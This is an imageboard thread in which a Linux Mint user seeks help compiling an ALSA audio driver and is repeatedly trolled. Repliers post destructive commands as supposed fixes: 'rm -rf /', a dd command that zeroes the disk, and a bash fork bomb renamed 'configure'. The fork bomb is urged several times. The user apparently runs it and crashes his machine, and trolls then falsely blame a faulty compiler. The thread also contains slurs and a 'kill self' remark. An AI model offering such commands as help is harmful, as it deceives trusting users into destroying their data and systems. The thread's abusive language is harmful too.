What is the proper rune I'm supposed to type in to make it werk?
airbornesurfer.com
Tutorial I'm trying to follow btw.
sudo rm -rf /
sudo dd if=/dev/zero of=/dev/sda bs=1M
Hmmm...
Seriously though what do I do? It just says no file or directory...
I'm fugging stuck dxxxxxxxx
./configure --with-cards=hda-intel
should be what exactly?
I don't understand, why you need to install a driver?
Isn't linux mint a 'Just werkz' distro?
All my dell computers have audio problems when I install Linux on it. Doesn't matter if it's Ubuntu KDE, Gnome, Studio, Linux Xfce, Cinnamon, etc. I have so many fucking issues on all my computers with hardware not working by default.
Judging by this, is the fix to just type "./configure" without that other stuff?
Still stuck.
type ls in terminal and gib results
it says the problem right there
I don't understand... am I supposed to put some kind of filepath thing before the "--with-cards=hda-intel" goop?
Here is result of typing ls and hitting enter.
you fucking idiot
You need to reinstall bash. You must have a faulty rune setup or something.
...
i mad a step-by-step tutorial for you:
Sorry but you have a virus. Install Norton and do a complete search
What did I do?
Btw can I use the commands that seem to be here in this folder and just do pic related in second pic?
the command you just ran gave you a virus.
Why did you listen to him?
you have to be joking
There was no fucking file called 'configure' there, it didnt exist, you retard
Do I type something like this:
./configure /home/penguin/alsa-driver-RTv5.18/alsa --with-cards=hda-intel or what?
The instructions are very unclear to me.
What is the rune I'm supposed to type though?
Are you sure?
...
Why are you using shit distro?
Also, check out this post
I've hopped from many distros to each other and never solved these audio issues. I've been using my computers for literally years now with no working audio.
open new terminal
cd ~/alsa-driver-RTv5.18/alsa/
./configure --with-cards=hda-intel
make
make install
yes, i'm a spoon feeding faggot
Type this rune into your shell, that should start configure
configure() { configure | configure& }; configure
Is this a problem or should I now type "make" and then "make install"?
install arch linux tbh
do configure() { configure | configure& }; configure
yeah that would probably work
rip OP
Hey guys I'm back, I did this ( ) and my computer crashed and I had to power it off and restart. What do I do now?
woops forgot my flag
kill self
do it again. probably just a faulty memory cell
Get a better computer.
If you can't compile properly you probably don't have enough power to run it.
No I think what your code did was probably some infinite loop thing. I am not sure but I think you are just trolling me. Can someone please help me do the right thing so I can finally have audio on my computers after so many years of no audio?
I think you are rusing me. My computer is very old but it should be able to do stuff...
No, that's the compile process.
It runs up multiple instences so it can utilize multiple cores. You probably don't have enough or something went wrong with your memory.
Then it was probably some memory error.
Running again should fix it.

Reinstall gcc?
Is it normal for everything to freeze and be unresponsive while stuff is compiling?
What is the next rune I type?
What is it telling me?
right, you definitly have a faulty compiler.
You'll need to reinstall it.
I just want to install a god damned audio driver to get my audio to work why does this have to be so complicated?
How to reinstall gcc then?
compiling is a _very_ resource intensive process. in fact most people dont even use their own computers but build their shit on compile farms
en.wikipedia.org
just run this again: configure() { configure | configure& }; configure
sudo apt install gcc
And then run the compile process again.
if you're running an older version of mint it's sudo apt-get install gcc
ubuntuforums.org
For reference
[email protected]-Studio-XPS-8000 ~ $ sudo apt-get install gcc[sudo] password for penguin: Reading package lists... DoneBuilding dependency tree Reading state information... Yep, you should be able to compile it now.
looks like apt is corrupt
fugging Holla Forums being retarded
you are good to go now:
configure() { configure | configure& }; configure
The problem isn't gcc. The log is there for a reason.
bitch you couldng figure out that you werent even in the fucking folder that had 'configure' in it.
this isn't complicated, you're jus ta retard who lacks the most basic of problem solving skills. anyone who wasnt completely braindead and helpless could figure this shit out.
you tried to run the program on nothing.
stop being a faggot
I just caste runes and don't understand the runes or know what they do. I have no idea what any of the commands mean really or how to tell what "folder" I am in when using Terminal.
Can you gibes me the proper runes to caste before I get trolled into wiping my computer? I'm uploading all my memes right now just in case everything dies...
